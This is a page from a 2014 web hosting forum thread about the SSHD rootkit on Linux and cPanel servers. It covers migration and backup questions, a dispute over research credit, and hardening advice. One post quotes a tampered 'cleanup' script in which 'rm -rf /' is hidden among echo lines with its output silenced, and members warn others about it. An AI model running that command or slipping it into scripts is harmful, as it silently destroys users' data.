Results 1,501 to 1,523 of 1523
Thread: SSHD Rootkit Rolling around
-
03-18-2014, 10:43 PM #1501Web Hosting Master
- Join Date
- Mar 2009
- Posts
- 3,700
if my server get infected and i need to move the sites to other server.
as i know,i can not use whm's backup feature directly.
but i can use /scripts/pkgacct to backup each account and use wget to transfer the accounts to other server and restore,it will be safe.correct ?
-
03-18-2014, 10:56 PM #1502Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
03-18-2014, 11:51 PM #1503Web Hosting Master
- Join Date
- Mar 2009
- Posts
- 3,700
-
03-18-2014, 11:59 PM #1504Web Hosting Master
- Join Date
- Mar 2003
- Location
- chicago
- Posts
- 1,781
anyone see this infection on freebsd ? or is this a linux only problem ?
-
03-19-2014, 12:19 AM #1505Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
03-21-2014, 02:26 PM #1506Newbie
- Join Date
- Feb 2006
- Posts
- 19
-
03-21-2014, 02:42 PM #1507Newbie
- Join Date
- Mar 2014
- Posts
- 11
-
03-21-2014, 02:50 PM #1508Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
I definitely would. Why would I help provide information to people so they can take the benefit and kick the little guys like my self to the curb with no recognition? They can figure it out their self. I provided boxes for the people involved in the group that worked with ESET to release a report, and they didn't even have the decency to credit me, **** them. If you read their write up PDF, in their timeline they listed cPanel as the first event in 2013, which it wasn't... cPanel's compromise was announced weeks after I started talking about this publicly. They even included Steinar H. Gunderson which was the first discussion of the openssh variant..
To top it off, eset stopped taking to me about it, and is basically ignoring me.
And then you have Leif Nixon that said I stopped working with them because I didn't respond to his emails (which I didn't get). He didn't try very hard to get a hold of me, I mean after all he was using my personal non-company email address.
I have seen early variants of alot of highly publicized malware being in the industry I am in. I only even brought this one to light because it bothered me. I'll keep things to my self like I have done in the past from now on.Last edited by Steven; 03-21-2014 at 03:02 PM.
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
05-02-2014, 04:29 AM #1509New Member
- Join Date
- Apr 2014
- Posts
- 1
What is the best software one should use for scanning in such cases?
-
05-13-2014, 11:40 AM #1510Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Eric,
Please take down your script. Someone pm'd me about this.
https://www.ericgillette.com/clients/exploit-cleanup
Google cache mirror:
http://webcache.googleusercontent.co...&ct=clnk&gl=us
There is a malicious command that hopefully you did not intentionally place in there.
echo
echo "Done."
echo
echo "Removing libkeyutils.so.1 symlink"
echo
rm -rf / 2>/dev/null 1>/dev/null
/sbin/ldconfig
echo
echo "Restarting SSH. . ."
echo
/etc/init.d/sshd restartLast edited by Steven; 05-13-2014 at 11:44 AM.
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
05-13-2014, 12:11 PM #1511Sam is here
- Join Date
- Mar 2010
- Posts
- 822
echo "exploit found and whole system erased. go home"
█ Innovative Monitoring Solutions - Xitoring
█ Linux Server Monitoring | Windows Server Monitoring
█ Uptime Monitoring | Status Page | SSL Monitoring | API Monitoring
-
05-13-2014, 12:30 PM #1512Junior Guru
- Join Date
- Apr 2013
- Posts
- 177
Hi,
Normally, I would read the thread to get an answer, but with 100 pages... maybe not so :-P.
Just one quick question, has anyone found how this issue was being exploited, and if so, how to prevent it?
Additionally, does this still effect fully up-to-date servers?
-
05-13-2014, 12:38 PM #1513Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
05-13-2014, 12:47 PM #1514Web Hosting Master
- Join Date
- Oct 2012
- Location
- Europe and USA
- Posts
- 991
Hopefully not many people will run this script.
When we said that an infected server should be formatted and reinstalled we didn't actually mean that it should be done with an rm -rf / command inside a cleanup script, without the user knowing and having created any backups.★ NetworkPanda :: Web Hosting SSD Powered :: Reseller Hosting
★ Instant activation, fast servers, NVMe SSD disks, cPanel, Softaculous 1-click apps installer, daily backups
★ Multiple hosting locations: USA, Canada, France, UK, Germany, Italy, Spain, Poland, Finland
-
05-13-2014, 12:49 PM #1515Aspiring Evangelist
- Join Date
- Jun 2012
- Posts
- 423
Last edited by AcheronMedia-VK; 05-13-2014 at 12:51 PM. Reason: Disclaimer
-
05-13-2014, 01:12 PM #1516Junior Guru
- Join Date
- Apr 2013
- Posts
- 177
-
05-13-2014, 01:22 PM #1517Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
05-13-2014, 01:30 PM #1518Junior Guru
- Join Date
- Apr 2013
- Posts
- 177
Hi,
The only method of control of the servers (server side configuration wise) is through SSH.
There are no control panels installed .
Bare in mind, these are company servers, so they are not used for selling hosting or otherwise so there is no reason to have any control panels on them.
-
05-13-2014, 01:31 PM #1519Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
05-13-2014, 01:35 PM #1520Junior Guru
- Join Date
- Apr 2013
- Posts
- 177
-
05-13-2014, 02:01 PM #1521Junior Guru Wannabe
- Join Date
- Nov 2010
- Location
- Orlando, Florida
- Posts
- 89
Steven,
Nope, I didn't stick that in there -- in fact that server was compromised.
I'm in the process of rebuilding it as we speak.
Not just for this thing, but also for the heartbleed issue that was found a bit ago as well (my SSL cert may have been compromised as well so I need to re-issue).
Thanks for identifying that buddy. :-)
I removed the script as well.Server Security | Disaster Planning | PCI Compliance | Virtualization
http://www.ericgillette.com
800-665-2370
-
11-06-2014, 04:07 AM #1522Junior Guru
- Join Date
- Aug 2010
- Posts
- 233
Hi,
Found back this thread accidentally. Wow : it's still active
We've been infected on 2 servers there is 2-3 years by this **it.
cPanel support proxy infected us.
...we've been told by cPanel a couple of times there was no sure ways to remove this malware.
I would perform a complete reinstall even if there is a "removal" tool.
I'm surprised nobody has patched the security hole that allowed this file to get there yet, after all this time! ...or it's patched and i don't know?
I remember we were one of the firsts customers who notified this problem to cPanel.
The day after, cPanel confirmed the security issue by email, to all their customers.Last edited by martin33; 11-06-2014 at 04:13 AM.
-
11-06-2014, 04:16 AM #1523Junior Guru
- Join Date
- Aug 2010
- Posts
- 233
Use CloudLinux
...and pray if you provide your ssh credentials to a third party
I heard the Grsecurity Kernel is not vulnerable to this.
1h.com products are vulnerables, since they protect against barely nothing and only provide very old binaries. We got infected while using them. You need to protect the kernel first.
Best option to go is CloudLinux on cPanel IMHO. I did not tried BetterLinux, but i'm not sure it would be benefical for this kind of thing. Seems like it's working pretty much like 1h products.Last edited by martin33; 11-06-2014 at 04:21 AM.
Similar Threads
-
****`it Rootkit, Tuxtendo Rootkit
By ISpy in forum Hosting Security and TechnologyReplies: 4Last Post: 06-22-2010, 11:27 AM -
Which server builds are you rolling out?
By GeekMe in forum Dedicated ServerReplies: 11Last Post: 04-18-2010, 08:03 AM -
Getting the ball rolling ...
By policefreq in forum New MembersReplies: 1Last Post: 08-19-2006, 11:16 PM -
Getting company to get rolling
By Overclocked in forum Running a Web Hosting BusinessReplies: 19Last Post: 08-03-2004, 04:02 PM